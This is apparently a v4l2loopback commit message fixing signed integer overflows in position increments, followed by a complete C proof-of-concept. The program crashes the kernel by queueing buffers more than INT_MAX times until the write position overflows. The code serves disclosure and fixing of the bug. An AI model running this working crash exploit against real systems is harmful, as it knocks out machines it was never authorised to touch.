Fix signed integer overflows in increments.

[stoeckmann]

It could happen that position increments overflow after a long time of operation. Signed integer overflows are undefined behaviour. In this case they also lead to illegal index values and subsequent out of boundary access.

Reviewed-by: Benny Baumann BenBE@geshi.org
Signed-off-by: Tobias Stoeckmann tobias@stoeckmann.org

[stoeckmann]

Proof of Concept (kernel crash):

#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/videodev2.h>

#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>

void hax0r_out(char* message, bool success, int err) {
	printf("\033[1;37m[*]\033[0m %s: %s\n", message, success ? "\033[1;32msuccess\033[0m" : "\033[1;31mfailed\033[0m");
	if(!success) {
		printf("ERROR %d: %s\n", err, strerror(err));
		exit(1);
	}
}

static void loopback_init(int fdwr, int w, int h) {
	struct v4l2_capability vid_caps;
	struct v4l2_format vid_format;

	size_t linewidth = w * 2;
	size_t framesize = h * linewidth;

	int ret_code;

	ret_code = ioctl(fdwr, VIDIOC_QUERYCAP, &vid_caps);
	hax0r_out("Querying device capabilities", ret_code >= 0, errno);

	memset(&vid_format, 0, sizeof(vid_format));
	vid_format.type = V4L2_BUF_TYPE_VIDEO_OUTPUT;
	vid_format.fmt.pix.width = w;
	vid_format.fmt.pix.height = h;
	vid_format.fmt.pix.pixelformat = V4L2_PIX_FMT_YUYV;
	vid_format.fmt.pix.sizeimage = framesize;
	vid_format.fmt.pix.field = V4L2_FIELD_NONE;
	vid_format.fmt.pix.bytesperline = linewidth;
	vid_format.fmt.pix.colorspace = V4L2_COLORSPACE_SRGB;

	ret_code = ioctl(fdwr, VIDIOC_S_FMT, &vid_format);
	hax0r_out("Setting frame format", ret_code >= 0, errno);

	ret_code = ioctl(fdwr, VIDIOC_STREAMON, &vid_format.type);
	hax0r_out("Activate video streaming", ret_code >= 0, errno);
}

static void loopback_free(int fdwr) {
	const enum v4l2_buf_type type = V4L2_BUF_TYPE_VIDEO_OUTPUT;

	int ret_code = ioctl(fdwr, VIDIOC_STREAMOFF, &type);
	hax0r_out("Deactivate video streaming", ret_code >= 0, errno);
}

int main(int argc, char **argv) {
	char *dev;
	int fd, ret_code;
	char *ptr1, *ptr2;
	struct v4l2_buffer buf = { 0 };
	unsigned i;

	if (argc < 2) {
		hax0r_out("Checking arguments", false, EINVAL);
	}

	dev = argv[1];
	hax0r_out("Checking device filename", strlen(dev), EINVAL);

	fd = open(dev, O_RDWR | O_CLOEXEC);
	hax0r_out("Opening device", fd >= 0, errno);

	loopback_init(fd, 800, 600);

	/* Here be exploits … */
	buf.type = V4L2_BUF_TYPE_VIDEO_OUTPUT;
	buf.bytesused = 962560;

#define COUNT (INT_MAX + 100U)
	for (i = 0; i < COUNT; i++) {
		if (i % 1000000 == 0 || i == COUNT - 1) {
			printf("\r\033[1;37m[*]\033[0m Overflow write_position: % 6.2f %%",
			    i == COUNT - 1 ? 100.0 : (float)i / COUNT * 100);
			fflush(stdout);
		}
		ret_code = ioctl(fd, VIDIOC_QBUF, &buf);
		if (ret_code < 0) {
			break;
		}
	}
	if (i != 0) {
		printf("\n");
	}
	if (i != COUNT) {
		hax0r_out("Put buffer to queue", false, errno);
	}

	loopback_free(fd);

	hax0r_out("Closing device", close(fd) >= 0, errno);
	return 0;
}